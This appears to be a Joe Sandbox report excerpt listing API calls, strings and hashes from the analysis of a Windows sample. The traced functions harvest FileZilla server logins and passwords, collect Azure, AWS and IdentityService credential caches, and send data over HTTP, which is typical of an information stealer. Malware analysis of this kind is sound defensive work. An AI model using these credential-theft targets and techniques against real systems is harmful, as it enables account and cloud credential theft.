                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                            • String ID:
                                                            • API String ID: 362916592-0
                                                            • Opcode ID: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
                                                            • Instruction ID: 53553de3a79b1f70463da2062d917d9885e859450eb2732c1f0e2142222a8369
                                                            • Opcode Fuzzy Hash: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
                                                            • Instruction Fuzzy Hash: 921182B1A49218DBDB208B54DC49F99B778F744711F104399E90A932C0C7781E40CF51
                                                            APIs
                                                            • CoCreateInstance.COMBASE(0074E118,00000000,00000001,0074E108,00000000), ref: 00743758
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007437B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID:
                                                            • API String ID: 123533781-0
                                                            • Opcode ID: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
                                                            • Instruction ID: 77413b6f36953888d3a55742da3d0c5e1c4de17b60d52d0d4230c41e4731ac0c
                                                            • Opcode Fuzzy Hash: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
                                                            • Instruction Fuzzy Hash: D441F771A40A289FDB24DB58CC98B9BB7B4BB48702F5041D8E618E72D0E771AEC5CF50
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0074CEEF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 6498a770e5e75c72632304df1c338bfa7877370073ce39fad7123e7d8c724f4e
                                                            • Instruction ID: 6660f66f397a447c3375178b609596e275306bcbb0a3d5bd02322fc8c71a33d7
                                                            • Opcode Fuzzy Hash: 6498a770e5e75c72632304df1c338bfa7877370073ce39fad7123e7d8c724f4e
                                                            • Instruction Fuzzy Hash: 279002A52521204A475557745D0954526906A9961676648517112C4064DB9D40055616
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                                                              • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                                                              • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                                                              • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,007402E7,00000000), ref: 00739A5A
                                                              • Part of subcall function 007399C0: LocalFree.KERNEL32(007402E7), ref: 00739A90
                                                              • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                                                              • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                                                            • strtok_s.MSVCRT ref: 0074031B
                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00750DBA,00750DB7,00750DB6,00750DB3), ref: 00740362
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740369
                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00740385
                                                            • lstrlenA.KERNEL32(00000000), ref: 00740393
                                                              • Part of subcall function 007488E0: malloc.MSVCRT ref: 007488E8
                                                              • Part of subcall function 007488E0: strncpy.MSVCRT ref: 00748903
                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 007403CF
                                                            • lstrlenA.KERNEL32(00000000), ref: 007403DD
                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00740419
                                                            • lstrlenA.KERNEL32(00000000), ref: 00740427
                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00740463
                                                            • lstrlenA.KERNEL32(00000000), ref: 00740475
                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740502
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0074051A
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00740532
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0074054A
                                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00740562
                                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00740571
                                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00740580
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00740593
                                                            • lstrcatA.KERNEL32(?,00751678,?,?,00000000), ref: 007405A2
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007405B5
                                                            • lstrcatA.KERNEL32(?,0075167C,?,?,00000000), ref: 007405C4
                                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 007405D3
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 007405E6
                                                            • lstrcatA.KERNEL32(?,00751688,?,?,00000000), ref: 007405F5
                                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00740604
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00740617
                                                            • lstrcatA.KERNEL32(?,00751698,?,?,00000000), ref: 00740626
                                                            • lstrcatA.KERNEL32(?,0075169C,?,?,00000000), ref: 00740635
                                                            • strtok_s.MSVCRT ref: 00740679
                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074068E
                                                            • memset.MSVCRT ref: 007406DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Nt$Nt$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                            • API String ID: 337689325-4105784323
                                                            • Opcode ID: 00638fe7ee4566d5751a62dcce028db928ebe35b1c3567c9e1c5ffa51c094c2c
                                                            • Instruction ID: 055dd3b45041b7a681e73a6dcde2daa761f5207096899de408733e567617831f
                                                            • Opcode Fuzzy Hash: 00638fe7ee4566d5751a62dcce028db928ebe35b1c3567c9e1c5ffa51c094c2c
                                                            • Instruction Fuzzy Hash: 74D13E72950208EBDB04EBF4DD9AEEE7378FF54301F408418F506A6091DF78AA49DB62
                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
                                                              • Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                                                              • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007359F8
                                                            • StrCmpCA.SHLWAPI(?,00FCD800), ref: 00735A13
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00735B93
                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FD1E98,00000000,?,00FC4C60,00000000,?,00751A1C), ref: 00735E71
                                                            • lstrlenA.KERNEL32(00000000), ref: 00735E82
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00735E93
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00735E9A
                                                            • lstrlenA.KERNEL32(00000000), ref: 00735EAF
                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00735EC6
                                                            • lstrlenA.KERNEL32(00000000), ref: 00735ED8
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00735EF1
                                                            • memcpy.MSVCRT(?), ref: 00735EFE
                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00735F1B
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00735F2F
                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00735F4C
                                                            • InternetCloseHandle.WININET(00000000), ref: 00735FB0
                                                            • InternetCloseHandle.WININET(00000000), ref: 00735FBD
                                                            • HttpOpenRequestA.WININET(00000000,00FCD8E0,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00735BF8
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • InternetCloseHandle.WININET(00000000), ref: 00735FC7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                            • String ID: "$"$------$------$------
                                                            • API String ID: 1406981993-2180234286
                                                            • Opcode ID: f738141c30259a37fd454c41dc23386b223892f38d5c20f83160a66cead66b9d
                                                            • Instruction ID: e322a6ae907805b07957b76d50545ea384f72ca4e4812e78a85894c6d4ee70dd
                                                            • Opcode Fuzzy Hash: f738141c30259a37fd454c41dc23386b223892f38d5c20f83160a66cead66b9d
                                                            • Instruction Fuzzy Hash: F312E072960118FAEB15EBA0DC99FEEB37CFF54700F5041A9B10A62091DF782A49CF65
                                                            APIs
                                                            • memset.MSVCRT ref: 00744D87
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00744DB0
                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00744DCD
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                                                              • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                                                            • memset.MSVCRT ref: 00744E13
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00744E3C
                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00744E59
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                                                              • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                                                              • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
                                                            • memset.MSVCRT ref: 00744E9F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00744EC8
                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00744EE5
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449B0
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,007508D2), ref: 007449C5
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449E2
                                                              • Part of subcall function 00744910: PathMatchSpecA.SHLWAPI(?,?), ref: 00744A1E
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,00FCD870,?,000003E8), ref: 00744A4A
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FF8), ref: 00744A5C
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A70
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FFC), ref: 00744A82
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A96
                                                              • Part of subcall function 00744910: CopyFileA.KERNEL32(?,?,00000001), ref: 00744AAC
                                                              • Part of subcall function 00744910: DeleteFileA.KERNEL32(?), ref: 00744B31
                                                            • memset.MSVCRT ref: 00744F2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zat
                                                            • API String ID: 4017274736-1609225583
                                                            • Opcode ID: 44bef066371d3e3aa1719ec096f7c8743247fea58bfe330017f00671927ff21a
                                                            • Instruction ID: d85e4921e8538499d70f65a441fdc30dfcc785ffae9584b9e0a2241d46453698
                                                            • Opcode Fuzzy Hash: 44bef066371d3e3aa1719ec096f7c8743247fea58bfe330017f00671927ff21a
                                                            • Instruction Fuzzy Hash: 5E4183B6940208A7D754F760DC4BFDD3738AB54701F404494B64AA60C1EEF85BD88B92
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 00748B60: GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073CF83
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0073D0C7
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0073D0CE
                                                            • lstrcatA.KERNEL32(?,00000000,00FCD610,00751474,00FCD610,00751470,00000000), ref: 0073D208
                                                            • lstrcatA.KERNEL32(?,00751478), ref: 0073D217
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073D22A
                                                            • lstrcatA.KERNEL32(?,0075147C), ref: 0073D239
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073D24C
                                                            • lstrcatA.KERNEL32(?,00751480), ref: 0073D25B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073D26E
                                                            • lstrcatA.KERNEL32(?,00751484), ref: 0073D27D
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073D290
                                                            • lstrcatA.KERNEL32(?,00751488), ref: 0073D29F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073D2B2
                                                            • lstrcatA.KERNEL32(?,0075148C), ref: 0073D2C1
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0073D2D4
                                                            • lstrcatA.KERNEL32(?,00751490), ref: 0073D2E3
                                                              • Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
                                                              • Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885
                                                            • lstrlenA.KERNEL32(?), ref: 0073D32A
                                                            • lstrlenA.KERNEL32(?), ref: 0073D339
                                                            • memset.MSVCRT ref: 0073D388
                                                              • Part of subcall function 0074AA70: StrCmpCA.SHLWAPI(00000000,00751470,0073D1A2,00751470,00000000), ref: 0074AA8F
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0073D3B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                            • String ID:
                                                            • API String ID: 2775534915-0
                                                            • Opcode ID: d7d46185a0d804530626447547e9ad12d020eebf9a5e7d00d69ac3f5112ab0d7
                                                            • Instruction ID: bf15449e318ac4df89b4e5b532dfc7fa95be8b5a49c0d7d274c7aa8854ff7d70
                                                            • Opcode Fuzzy Hash: d7d46185a0d804530626447547e9ad12d020eebf9a5e7d00d69ac3f5112ab0d7
                                                            • Instruction Fuzzy Hash: 57E13D72954108EBEB05EBA0DD9AEEE737CFF54301F104158F106A6092DF39AE49DB62
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FD0300,00000000,?,0075144C,00000000,?,?), ref: 0073CA6C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0073CA89
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0073CA95
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0073CAA8
                                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0073CAB5
                                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0073CAD9
                                                            • StrStrA.SHLWAPI(?,00FD00F0,00750B52), ref: 0073CAF7
                                                            • StrStrA.SHLWAPI(00000000,00FD01B0), ref: 0073CB1E
                                                            • StrStrA.SHLWAPI(?,00FD0990,00000000,?,00751458,00000000,?,00000000,00000000,?,00FCD730,00000000,?,00751454,00000000,?), ref: 0073CCA2
                                                            • StrStrA.SHLWAPI(00000000,00FD05D0), ref: 0073CCB9
                                                              • Part of subcall function 0073C820: memset.MSVCRT ref: 0073C853
